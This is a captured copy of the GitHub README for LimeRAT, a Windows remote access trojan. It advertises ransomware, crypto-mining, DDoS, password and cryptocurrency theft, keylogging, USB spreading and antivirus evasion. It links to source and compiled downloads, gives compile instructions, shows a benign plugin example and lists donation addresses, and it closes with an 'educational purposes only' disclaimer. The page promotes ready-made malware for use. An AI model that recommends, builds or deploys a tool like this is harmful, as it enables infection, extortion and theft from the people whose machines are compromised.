1/6

NYAN-x-CAT

GitHub - NYAN-x-CAT/Lime-RAT: LimeRAT | Simple, yet powerful remote
administration tool for Windows (RAT)

github.com/NYAN-x-CAT/Lime-RAT/

Outdated. Archive it instead of delete it

LimeRAT v0.1.9

Remote Administration Tool For Windows

Description

https://github.com/NYAN-x-CAT/Lime-RAT/
https://camo.githubusercontent.com/ec449e78d20ec8b78bc8c54dd8d466f7b5b3c3ae9b390e0cb9ce6f4ba61fd777/68747470733a2f2f692e696d6775722e636f6d2f4971354d6b41662e676966


2/6

Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a
general knowledge about dotNET malwares and how it behaves.

Main Features

.NET
Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0

Connection
Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports

Plugin
Using plugin system to decrease stub's size and lower the AV detection

Encryption
The communication between server & client is encrypted with AES

Spreading
Infecting all files and folders on USB drivers

Bypass
Low AV detection and undetected startup method

Lightweight
Payload size is about 25 KB

Anti Virtual Machines
Uninstall itself if the machine is virtual to avoid scanning or analyzing

Ransomware
Encrypting files on all HHD and USB with .Lime extension

XMR Miner
High performance Monero CPU miner with user idle\active optimizations

DDoS
Creating a powerful DDOS attack to make an online service unavailable

Crypto Stealer
Stealing Cryptocurrency sensitive data

Screen-Locker
Prevents user from accessing their Windows GUI

And more
On Connect Auto Task
Force enable Windows RDP
Persistence
File manager
Passowrds stealer
Remote desktop
Bitcoin grabber
Downloader
Keylogger

Prerequisites

To open project you need:

1. Visual Studio 2017
2. This repository

Peek

Project



3/6

Ransomware

Critical Process

https://camo.githubusercontent.com/bfd3e7a7086ae8bf8746aea1d1926ac18122782ff3cea2e815c32042aad61314/68747470733a2f2f692e696d6775722e636f6d2f6c6b7a4d3738382e676966
https://camo.githubusercontent.com/76e09f4ff655ef3f8421742a334a04b9bffa2d2b2099f08310c92e57a34f2d88/68747470733a2f2f692e696d6775722e636f6d2f615a6a705846652e676966


4/6

Plugin Example

VB.NET

C#

'Easy to create a DLL plugin 
Public Class Main 
'Simple Msgbox 
Public Shared Sub CN(ByVal H As String, ByVal P As Integer, ByVal K As String, ByVal SP As String, ByVal PW 
As String, ByVal FP As String, ByVal HW As String, ByVal BT As String, ByVal PB As String) 

 Msgbox("Hello Client!") 

 Send("MSG" + SPL + "Hello Server!") 
 'Client will send msg back to server, MSG will be showen in [LOG] Tab 

 
End Sub  
End Class

https://camo.githubusercontent.com/0f9e2ece09cdfdbefa8ac7159a6fffbd40f0c38000b1fcfc51e6a28abc35cf39/68747470733a2f2f692e696d6775722e636f6d2f554c7146376e352e676966


5/6

Testing

1. Open "LimeRAT.sln"
2. Set Compiler to "Debug" mode
3. On Solution Explorer, Right click on "Solution LimeRAT Project" and press "Rebuild Solution"
4. Press Run button. be aware that both client and server are localhost

Compiling

1. Open "LimeRAT.sln"
2. Set Compiler to "Release" mode
3. On Solution Explorer, Right click on "Solution LimeRAT Project" and press "Rebuild Solution"
4. Everything will be under "\Project_EXE\Release"
5. Convert stub.exe to stub.il, using Ildasm

Download SRC and compiled version

https://github.com/NYAN-x-CAT/Lime-RAT/releases

Notes

1. While using ransomware, restore point won't be deleted unless payload is running hight privilege
2. Anti-Kill (BSOD) won't work unless payload is running hight privilege

Found a bug? Please, report it here https://github.com/NYAN-x-CAT/Lime-RAT/issues/new

Author

NYAN CAT

Donation

Buy me a coffee!

XMR:
49H8Kbf15JFN2diG5evGHA5G49qhgFBuDid86z3MKxTv59dcqySCzFWUL3SgsEk2SufzTziHp3UE5P8BatwuyFuv1bBKQw2

BTC: 12hTx7u7AqdNr8qo4UFuLwb6XAVjoDioax

public class Main 
{ 
   // Simple Msgbox 
   public static void CN(string H, int P, string K, string SP, string PW, string FP, string HW, string BT, 
string PB) 
   { 
       Msgbox("Hello Client!"); 

       Send("MSG" + SPL + "Hello Server!"); 
 // Client will send msg back to server, MSG will be showen in [LOG] Tab 

   } 
}

This project was only tested on local-lab[LAN]. I did not test it on external-lab[WAN]. 
Server tested on Windows 10, Client tested on virtual machine windows 7. 

https://pastebin.com/raw/rGCQC1zq
https://github.com/NYAN-x-CAT/Lime-RAT/releases
https://github.com/NYAN-x-CAT/Lime-RAT/issues/new


6/6

Support

Github: https://github.com/NYAN-x-CAT/Lime-RAT/issues/new
Email: NYANxCAT@pm.me

Disclaimer

I, the creator, am not responsible for any actions, and or damages, caused by this software.

You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes
only.

This software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to
use.

By using this software, you automatically agree to the above.

License
license mit

This project is licensed under the MIT License - see the LICENSE file for details

https://github.com/NYAN-x-CAT/Lime-RAT/issues/new
http://10.10.0.46/mailto:NYANxCAT@pm.me
https://github.com/NYAN-x-CAT/Lime-RAT/blob/master/LICENSE
https://github.com/NYAN-x-CAT/Lime-RAT/blob/master/LICENSE